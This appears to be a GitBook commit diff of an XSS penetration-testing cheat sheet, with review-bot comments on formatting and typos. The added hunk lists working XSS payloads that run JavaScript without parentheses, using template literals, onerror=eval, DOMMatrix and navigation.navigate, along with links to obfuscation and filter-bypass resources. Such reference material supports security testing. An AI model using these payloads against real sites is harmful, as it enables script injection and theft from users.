GitBook: [#3501] No subject

CPol 2022-09-23 09:06:24 +00:00 committed by gitbook-bot
parent c6405d9dcc
commit fd7e8de8d4
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -201,7 +201,7 @@ Some **examples**:
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
In this case and if no black/whitelisting is used, you could use payloads like:
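Review bot: the replacement note line fixes its rendering by dropping the stray `\*\*\*\*\*\*\*\*` escape run, but it still ends without a period, and the two context sentences just above keep their typos ("if check if you can abuse", "deleted of if it is", "For this cases"); since this sync already touches the paragraph, fixing those in the same commit would be cheap. The claim itself is fine: an HTML comment is terminated by either `-->` or `--!>`.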
@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36))
**JavaScript without parentheses**
```javascript
````javascript
alert`1`
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
```
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
throw onerror=alert,1337
Function`x${'alert\x281337\x29'}x```
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
valueOf=alert;window+''
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
window.name='javascript:alert(1)'
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
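Review bot: the switch from a three- to a four-backtick fence is justified, because the added `Function` template-literal payload ends in three consecutive backticks that a three-backtick fence could be read as closing, and the closing fence is changed to four backticks to match, so the block stays balanced. Two documentation points on the new lines: the `<img src=x onerror=...>` entry needs an HTML injection context while every other entry is pure JavaScript, and the `DOMMatrix` and `navigation.navigate` entries depend on browser support for those APIs; a short `//` comment on each, like the existing `// or any DOMXSS sink such as location=name`, would tell readers when each payload applies.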
@ -807,7 +818,7 @@ with(this)
### Obfuscation & Advanced Bypass
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\*
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
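Review bot: the edit only strips the trailing `\*\*\*\*` residue from the aurebesh.js bullet; while here, the last bullet's link text `https://javascriptobfuscator.herokuapp.com/` does not match its target `https://javascriptobfuscator.herokuapp.com` (trailing slash), which is worth aligning so the rendered text and the href agree.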
@ -816,6 +827,7 @@ with(this)
* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
```javascript
//Katana
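Review bot: the added PortSwigger "seventh way to call a JavaScript function without parentheses" link is filed under Obfuscation & Advanced Bypass, but it belongs with the two references that already follow the **JavaScript without parentheses** block earlier in this diff; moving it there keeps the no-parentheses material in one place. The context line "More sofisticated JSFuck" also carries a typo ("sophisticated").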